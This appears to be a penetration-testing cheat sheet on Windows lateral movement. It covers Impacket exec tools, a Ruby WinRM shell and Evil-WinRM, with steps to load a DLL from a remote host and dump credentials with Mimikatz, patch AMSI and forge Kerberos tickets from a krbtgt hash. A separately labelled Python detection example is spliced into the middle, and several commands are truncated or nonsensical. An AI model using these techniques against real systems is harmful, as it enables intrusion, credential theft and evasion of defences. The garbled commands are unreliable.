Remote Execution Techniques

Impacket tools

# psexec
# PSEXEC-like functionality using RemComSvc.
domain/user:password@IP <command>

# smbexec
# A similar approach to PSEXEC without using RemComSvc. The technique is described here.
# Instantiates a local SMB server to receive the output of the commands.
# This is useful when the target machine does NOT have a writeable share available.
domain/user:password@IP <command>

# atexec
# Executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
domain/user:password@IP <command>

# wmiexec
# A semi-interactive shell, used through Windows Management Instrumentation.
# It does not require installing any service/agent on the target server. Runs as Administrator. Highly stealthy.
domain/user:password@IP <command>

# dcomexec
# A semi-interactive shell similar to the one above, but using different DCOM endpoints.
# Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.
domain/user:password@IP <command>


# You can use WinRM to execute remote commands and even get a shell
# Port 5985 needs to be open
# Default endpoint is /wsman
require 'winrm'

# Build the connection from the endpoint and the account to authenticate with
conn = WinRM::Connection.new(
  endpoint: 'http://ip:5985/wsman',
  user: 'domain/user',
  password: 'password'
)

# Open a PowerShell shell and loop: read a line, run it, stream stdout/stderr back
command = ""
conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    print "PS > "
    command = gets
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
    puts "Exiting with code #{output.exitcode}"
  end
end
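Detection-side view of the techniques listed above (service-based psexec/smbexec, atexec through the Task Scheduler, wmiexec over WMI, dcomexec through MMC20.Application, and WinRM): an added Python example, not code from this page or from any of the tools, that classifies Windows event records by the host-side artefact each technique leaves. The `KNOWN_SERVICES` allowlist, the parent-process mapping, the service name `BTOBTO` and all sample events are assumptions constructed for the example.

```python
import ntpath

# Assumed allowlist of services the organisation expects to see installed;
# any other Event 7045 service install is treated as psexec-style behaviour.
KNOWN_SERVICES = {"MyBackupSvc"}

# Security 4688 parent image -> technique: the WMI provider host for wmiexec,
# the WinRM provider host for WinRM/Evil-WinRM, mmc.exe for MMC20.Application.
PARENT_TO_TECHNIQUE = {
    "wmiprvse.exe": "wmiexec (child of WMI provider host)",
    "wsmprovhost.exe": "winrm (child of WinRM provider host)",
    "mmc.exe": "dcomexec (child of mmc.exe via MMC20.Application)",
}

def classify(event):
    """Return a technique label for one parsed event, or None if it looks benign."""
    eid = event.get("event_id")
    if eid == 7045:  # System: a new service was installed
        image = event.get("ImagePath", "")
        # smbexec runs each command as a short-lived service that wraps cmd.exe
        if "%COMSPEC%" in image.upper() or "cmd.exe" in image.lower():
            return "smbexec (cmd.exe wrapped in a service)"
        if event.get("ServiceName") not in KNOWN_SERVICES:
            return "psexec (unexpected service binary installed)"
        return None
    if eid == 4698:  # Security: a scheduled task was created
        return "atexec (scheduled task created)"
    if eid == 4688:  # Security: process creation, keyed on the parent image
        parent = ntpath.basename(event.get("ParentProcessName", "")).lower()
        return PARENT_TO_TECHNIQUE.get(parent)
    return None

def triage(events):
    """Index -> label for every event that matches one of the techniques."""
    return {i: lbl for i, ev in enumerate(events) if (lbl := classify(ev))}

# Constructed sample events (not a real log export): one per technique, one benign.
SAMPLE_EVENTS = [
    {"event_id": 7045, "ServiceName": "PgEb", "ImagePath": "%SystemRoot%\\PgEb.exe"},
    {"event_id": 7045, "ServiceName": "BTOBTO",
     "ImagePath": "%COMSPEC% /Q /c echo cd ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > %TEMP%\\execute.bat"},
    {"event_id": 4698, "TaskName": "\\UpdateTask"},
    {"event_id": 4688, "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"},
    {"event_id": 4688, "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wsmprovhost.exe"},
    {"event_id": 4688, "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\Windows\\System32\\mmc.exe"},
    {"event_id": 7045, "ServiceName": "MyBackupSvc", "ImagePath": "C:\\Backup\\svc.exe"},
]
```

`triage(SAMPLE_EVENTS)` returns the first six events labelled and leaves the allowlisted backup service alone; in practice the same rules run over parsed System and Security channel exports.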


# Evil-WinRM is another complete tool for WinRM

# Simple usage
$ ruby evil-winrm.rb -i -u user -p password

# Upload and Download
> upload local_filename (destination_filename)
> download remote_filename (destination_filename)

# List all services, showing whether your account has permissions over each one
> services

# Menu listing loaded modules (default presented below)
> menu 
# You can load local PS1 scripts just by typing script name
# The scripts must be in the path set at -s argument
> Powerview.ps1
> menu
# Using advanced commands

# Invoke-Binary
# Allows exes compiled from c# to be executed in memory
# The executables must be in the path set at -e argument
> Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'

# DLL Loader
# allows loading dll libraries in memory. The dll file can be hosted by smb, http or locally.
# You can then use auto-completion
> Dll-Loader -http -path http://xx.xx.xx.xx/sharpsploit.dll
> [Sharpsploit.Credentials.Mimikatz]::LogonPasswords()

# Donut Loader
# Injects x64 payloads generated with the donut technique
# No need to encode the payload.bin, just generate and inject
python3 covenant.exe

# Bypass-4MSI
# Patches AMSI protection
> amsiscanbuffer
> Bypass-4MSI
> amsiscanbuffer

# Using Kerberos

# First, synchronise the clock with the DC
rdate -n <dc-ip>

# Ticket generation (ticketer, kirbi from rubeus or mimikatz...)
-dc-ip <dc_ip> -nthash <krbtgt_nthash> -domain-sid <domain_sid> -domain <domain_name> <user>
# Convert a kirbi ticket to ccache
python ticket.kirbi ticket.ccache

# Add ccache ticket (2 ways)
export KRB5CCNAME=/foo/var/ticket.ccache
cp ticket.ccache /tmp/krb5cc_0

# Add realm to /etc/krb5.conf (for linux). Use of this format is important
             kdc =

# Check ticket